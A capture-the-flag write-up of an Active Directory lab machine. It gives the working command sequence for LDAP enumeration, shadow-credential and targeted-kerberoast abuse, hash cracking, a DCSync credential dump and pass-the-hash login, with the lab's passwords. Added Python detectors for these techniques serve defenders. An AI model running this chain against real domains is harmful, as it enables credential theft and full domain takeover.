In the name of Allah, and peace and blessings be upon the Messenger of Allah.
FreeDom Gaza
In this article, I explain how I exploited the machine and gained control over the Domain Controller to retrieve the root flag.
The article covers:
1. LDAP enumeration
2. Active Directory
3. Pass the hash
4. Privilege escalation
After starting the machine, we are given a username and password to begin with.
Now use nmap:
sudo nmap -A -O 10.10.11.42
We discovered multiple open ports, including:
21/tcp open ftp Microsoft ftpd
88/tcp open kerberos-sec
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
Attempting to exploit one of them directly did not work, because services such as FTP are restricted to specific authorized users.
Now run nmap's LDAP scripts:
nmap -n -sV --script "ldap* and not brute" 10.10.11.42
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-18 17:50 EST
Nmap scan report for 10.10.11.42
Host is up (0.51s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-19 05:50:38Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=administrator,DC=htb
| ldapServiceName: administrator.htb:dc$@ADMINISTRATOR.HTB
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=administrator,DC=htb
| serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=administrator,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=administrator,DC=htb
| namingContexts: DC=administrator,DC=htb
| namingContexts: CN=Configuration,DC=administrator,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=administrator,DC=htb
| namingContexts: DC=DomainDnsZones,DC=administrator,DC=htb
| namingContexts: DC=ForestDnsZones,DC=administrator,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 135541
| dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=administrator,DC=htb
| dnsHostName: dc.administrator.htb
| defaultNamingContext: DC=administrator,DC=htb
| currentTime: 20241119055107.0Z
|_ configurationNamingContext: CN=Configuration,DC=administrator,DC=htb
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=administrator,DC=htb
| ldapServiceName: administrator.htb:dc$@ADMINISTRATOR.HTB
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=administrator,DC=htb
| serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=administrator,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=administrator,DC=htb
| namingContexts: DC=administrator,DC=htb
| namingContexts: CN=Configuration,DC=administrator,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=administrator,DC=htb
| namingContexts: DC=DomainDnsZones,DC=administrator,DC=htb
| namingContexts: DC=ForestDnsZones,DC=administrator,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 135541
| dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=administrator,DC=htb
| dnsHostName: dc.administrator.htb
| defaultNamingContext: DC=administrator,DC=htb
| currentTime: 20241119055107.0Z
|_ configurationNamingContext: CN=Configuration,DC=administrator,DC=htb
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.30 seconds
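The rootDSE is readable without credentials by design, so everything nmap printed above is what any host on the network can learn, and a defender should know exactly what that is. Added example (not from the write-up): a parser for the ldap-rootdse lines above that pulls out the domain, the DC name, the functional levels and the partitions, run over a constructed excerpt of that output.

```python
import re

# Constructed excerpt of the ldap-rootdse output above (the full scan prints
# many more attributes; these are the ones this parser uses).
ROOTDSE_OUTPUT = """\
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| ldapServiceName: administrator.htb:dc$@ADMINISTRATOR.HTB
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| namingContexts: DC=administrator,DC=htb
| namingContexts: CN=Configuration,DC=administrator,DC=htb
| dnsHostName: dc.administrator.htb
| defaultNamingContext: DC=administrator,DC=htb
|_ configurationNamingContext: CN=Configuration,DC=administrator,DC=htb
"""

# Functional level numbers as Microsoft defines them (msDS-Behavior-Version).
FUNCTIONAL_LEVELS = {2: "Windows Server 2003", 3: "Windows Server 2008",
                     4: "Windows Server 2008 R2", 5: "Windows Server 2012",
                     6: "Windows Server 2012 R2", 7: "Windows Server 2016"}

# One nmap NSE output line: "| attr: value" or "|_ attr: value" (last line).
LINE_RE = re.compile(r"^\|_?\s*([A-Za-z][\w-]*):\s*(.*)$")

def parse_rootdse(text):
    """Turn the '| attribute: value' lines into attribute -> [values]."""
    attrs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group(1) == "ldap-rootdse":
            continue  # script header, "LDAP Results" and "<ROOT>" carry no data
        attrs.setdefault(m.group(1), []).append(m.group(2).strip())
    return attrs

def dn_to_domain(dn):
    """'DC=administrator,DC=htb' -> 'administrator.htb'."""
    return ".".join(p[3:] for p in dn.split(",") if p.upper().startswith("DC="))

def summarize(text):
    a = parse_rootdse(text)
    domain = dn_to_domain(a["defaultNamingContext"][0])
    dc = a["dnsHostName"][0]
    return {
        "domain": domain,
        "dc": dc,
        # A DC whose FQDN is outside its own domain is worth a second look.
        "dc_in_domain": dc.lower().endswith("." + domain.lower()),
        "global_catalog": a.get("isGlobalCatalogReady", ["FALSE"])[0] == "TRUE",
        "domain_level": FUNCTIONAL_LEVELS.get(int(a["domainFunctionality"][0]), "unknown"),
        "forest_level": FUNCTIONAL_LEVELS.get(int(a["forestFunctionality"][0]), "unknown"),
        "sasl": a.get("supportedSASLMechanisms", []),
        "partitions": len(a.get("namingContexts", [])),
    }
```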
After analysing the output, we found information related to the Domain Controller.
First, what is the LDAP protocol?
The Lightweight Directory Access Protocol (LDAP) is a protocol used to access and manage directory information over a network. It is commonly used in Active Directory environments to query, search, and modify data in directory services. LDAP operates over TCP/IP and facilitates authentication, authorization, and directory information retrieval, making it a critical component in managing network resources and permissions.”
Now that we understand this information, it's time to exploit it. We will execute the following command to uncover more details:
sudo crackmapexec smb 10.10.11.42 -u Olivia -p 'ichliebedich' --shares
After running the command, we discovered the shares exposed over the SMB file-sharing protocol.
We will use the following command to check whether the user has access to WinRM, a protocol used for remote management and automation in Windows environments.
WinRM (Windows Remote Management) listens by default on TCP ports 5985 and 5986.
netexec winrm 10.10.11.42 -u olivia -p ichliebedich
Then log in with the Evil-WinRM tool.
Now it is time to gather information about the devices and users using the BloodHound tool.
To gather usernames, we will use the **rpcclient** tool.
Then open BloodHound.
As we saw in Bloodhound, the user olivia has GenericAll permissions on the user michael.
Using pywhisker, add a KeyCredential to michael's msDS-KeyCredentialLink attribute and obtain a PFX file and its password.
└─$ python3 pywhisker.py -d "administrator.htb" -u "olivia" -p 'ichliebedich' --target "michael" --action "add"
[*] Searching for the target account
[*] Target user found: CN=Michael Williams,CN=Users,DC=administrator,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: f64082c5-c544-13c2-f448-0af02e13c155
[*] Updating the msDS-KeyCredentialLink attribute of michael
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: YQICVajS.pfx
[*] Must be used with password: LPPilQjsYfcOEsND0Kt6
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
Get the TGT of user michael.
Ticket Granting Ticket (TGT): this is the ticket a user receives when authenticating to the domain. To access a particular service, the user must hold a TGT and present it to the Ticket Granting Service (TGS), which checks that the information is correct before issuing a service ticket.
└─$ sudo python3 targetedKerberoast.py -v -d 'administrator.htb' -u 'olivia' -p ichliebedich
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (michael)
[+] Printing hash for (michael)
$krb5tgs$23$*michael$ADMINISTRATOR.HTB$administrator.htb/michael*$726c9e93c41b5d1e919a24daf817c667$...
[VERBOSE] SPN removed successfully for (michael)
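Both ACL abuses shown above, the msDS-KeyCredentialLink write with pywhisker and the SPN add / TGS request / SPN remove sequence of targetedKerberoast, are visible on the DC as Security events 5136 and 4769, provided Directory Service Changes auditing and a SACL on the user objects are in place. Added example (not from the write-up): detection logic for both patterns over constructed, simplified event records; the field names are mine, not the event XML names.

```python
from datetime import datetime, timedelta

# Constructed, simplified Security-log records (not real event XML).
# 5136 = directory object modified, 4769 = Kerberos service ticket requested.
# Microsoft's codes: OperationType 0x4000 = value added, 0x4001 = value
# deleted; ticket encryption type 0x17 = RC4-HMAC, the crackable one.
EVENTS = [
    {"id": 5136, "time": "2024-11-19T05:52:10", "subject": "olivia",
     "target": "michael", "attr": "msDS-KeyCredentialLink", "op": 0x4000},
    {"id": 5136, "time": "2024-11-19T05:55:01", "subject": "olivia",
     "target": "michael", "attr": "servicePrincipalName", "op": 0x4000},
    {"id": 4769, "time": "2024-11-19T05:55:02", "requester": "olivia",
     "service": "michael", "etype": 0x17},
    {"id": 5136, "time": "2024-11-19T05:55:03", "subject": "olivia",
     "target": "michael", "attr": "servicePrincipalName", "op": 0x4001},
    # Benign noise: a user enrolling a Windows Hello key on their own account.
    {"id": 5136, "time": "2024-11-19T06:10:00", "subject": "michael",
     "target": "michael", "attr": "msDS-KeyCredentialLink", "op": 0x4000},
]

def _t(e):
    return datetime.fromisoformat(e["time"])

def shadow_credential_writes(events):
    """KeyCredentialLink value added to an account by someone other than the
    account itself. Self-enrollment is expected; a third-party write is the
    pywhisker pattern and deserves a ticket."""
    return [(e["subject"], e["target"]) for e in events
            if e["id"] == 5136 and e["attr"] == "msDS-KeyCredentialLink"
            and e["op"] == 0x4000 and e["subject"].lower() != e["target"].lower()]

def targeted_kerberoast(events, window=timedelta(minutes=5)):
    """SPN added to a user, RC4 service ticket requested for that user, SPN
    removed again, all inside `window`: the targetedKerberoast sequence."""
    hits = []
    for add in events:
        if not (add["id"] == 5136 and add["attr"] == "servicePrincipalName"
                and add["op"] == 0x4000):
            continue
        later = [e for e in events if _t(add) <= _t(e) <= _t(add) + window]
        rc4 = any(e["id"] == 4769 and e["etype"] == 0x17
                  and e["service"] == add["target"] for e in later)
        removed = any(e["id"] == 5136 and e["attr"] == "servicePrincipalName"
                      and e["op"] == 0x4001 and e["target"] == add["target"]
                      for e in later)
        if rc4 and removed:
            hits.append((add["subject"], add["target"]))
    return hits
```

A single RC4 4769 is common in mixed environments; it is the add/request/remove triple on one account within minutes that is the high-confidence signal.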
Alternatively, since olivia has GenericAll over michael, his password can simply be reset:
net user michael Password123! /DOMAIN
Checking BloodHound, user michael has the ForceChangePassword permission on user benjamin, so go ahead and change benjamin's password as well.
The user benjamin is authorized to access the FTP service.
Log in to FTP and download the file Backup.psafe3.
┌──(dega㉿CyAlarm)-[~/Documents/administrator]
└─$ pwsafe2john Backup.psafe3 > pwsafe.hash
┌──(dega㉿CyAlarm)-[~/Documents/administrator]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt pwsafe.hash
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 128/128 SSE2 4x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho (Backu)
1g 0:00:00:00 DONE (2024-11-13 01:02) 2.040g/s 10448p/s 10448c/s 10448C/s newzealand..babygrl
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Open Backup.psafe3 with the cracked master password to retrieve the stored credentials, then test that emily's password is correct and that she can log in to WinRM.
User emily has GenericWrite permission on user ethan. Using the attack method introduced earlier, we can obtain ethan's TGT and crack the password.
┌──(dega㉿CyAlarm)-[~/Documents/administrator]
└─$ pywhisker -d administrator.htb -u emily -p <emily pass> --target ethan --action "add"
[*] Searching for the target account
[*] Target user found: CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 13aebc2e-a9ae-075b-e947-f1550dc6dc72
[*] Updating the msDS-KeyCredentialLink attribute of ethan
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: lWsEqVyu.pfx
[*] Must be used with password: S3MK5WBjZBhzJn6Umqvw
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
└─$ targetedKerberoast.py -v -d 'administrator.htb' -u emily -p <emily pass>
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$5fa946f70a46bec63a74e142c3c36ebf$bdfda40bf8f91e77be2f3dde4434ce64cc6667f4a017571e3a082a2a7770e76786cd90fe0aec394b4c19c97dd1f115a3d668f779e801f4988de00969fe84531651bfce69d5d68e57b088cafb64a97a9262b776f9a153d686...
[VERBOSE] SPN removed successfully for (ethan)
┌──(Dega㉿CyAlarm)-[~/Documents/administrator]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt ethan.hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<ethan pass> (?)
1g 0:00:00:00 DONE (2024-11-13 01:11) 20.00g/s 102400p/s 102400c/s 102400C/s Liverpool..babygrl
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Test it and you will find that ethan's password is correct.
┌──(dega㉿CyAlarm)-[~/Documents/administrator]
└─$ netexec smb 10.10.11.42 -u ethan -p <ethan pass>
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\ethan:<ethan pass>
Using ethan, you can dump the Administrator's hash:
└─$ impacket-secretsdump administrator.htb/ethan:<ethan pass> 10.10.11.42
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<admin_hash>:::
Then log in with Evil-WinRM using pass-the-hash:
./evil-winrm.rb -i 10.10.11.42 -u Administrator -H <admin hash>
Finally, change to emily's profile under Users and read the user flag.
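The "DRSUAPI method" line in the secretsdump output above is a directory replication request, which the DC logs as event 4662 carrying the replication control-access-right GUIDs when Directory Service Access auditing is on. Added example (not from the write-up): a filter that flags such requests from anything other than the DC computer account or an allow-listed sync account, over constructed, simplified records whose field names are mine.

```python
# Constructed, simplified 4662 (operation on an object) records standing in
# for the parsed event XML. "properties" lists the control-access-right GUIDs
# exercised; the two below are the replication rights a DRSUAPI replication
# (DCSync) needs. 0x100 is the ADS_RIGHT_DS_CONTROL_ACCESS bit of the mask.
REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {REPL_GET_CHANGES, REPL_GET_CHANGES_ALL}
CONTROL_ACCESS = 0x100

EVENTS_4662 = [
    # The DC itself replicating (DC$ from the rootDSE serverName): expected.
    {"subject": "DC$", "object_type": "domainDNS", "access_mask": CONTROL_ACCESS,
     "properties": [REPL_GET_CHANGES, REPL_GET_CHANGES_ALL]},
    # A directory-sync service account (hypothetical): fine only if allow-listed.
    {"subject": "svc_sync", "object_type": "domainDNS", "access_mask": CONTROL_ACCESS,
     "properties": [REPL_GET_CHANGES, REPL_GET_CHANGES_ALL]},
    # A plain user pulling NTDS secrets: the secretsdump step above.
    {"subject": "ethan", "object_type": "domainDNS", "access_mask": CONTROL_ACCESS,
     "properties": [REPL_GET_CHANGES, REPL_GET_CHANGES_ALL]},
    # The same user reading a property (0x10) on a user object: unrelated noise.
    {"subject": "ethan", "object_type": "user", "access_mask": 0x10,
     "properties": ["bf967aba-0de6-11d0-a285-00aa003049e2"]},
]

def dcsync_suspects(events, dc_accounts, allowlist=frozenset()):
    """Subjects that exercised replication rights on the domain naming context
    without being a DC computer account or an allow-listed sync account.
    A trailing '$' alone is not trusted: any compromised machine account would
    pass that test, so the caller supplies the real DC account names."""
    dcs = {a.lower() for a in dc_accounts}
    allowed = {a.lower() for a in allowlist}
    hits = []
    for e in events:
        used = {p.lower() for p in e["properties"]}
        if not (e["access_mask"] & CONTROL_ACCESS) or not (used & REPLICATION_RIGHTS):
            continue  # not a control-access operation with replication rights
        if e["object_type"] != "domainDNS":
            continue  # replication rights only matter on the naming context
        subj = e["subject"].lower()
        if subj in dcs or subj in allowed:
            continue
        hits.append(e["subject"])
    return hits
```

Because the DC answers a legitimate-looking replication request, the network-side view is just RPC to the DRSUAPI interface; this event-side check is the reliable place to catch it.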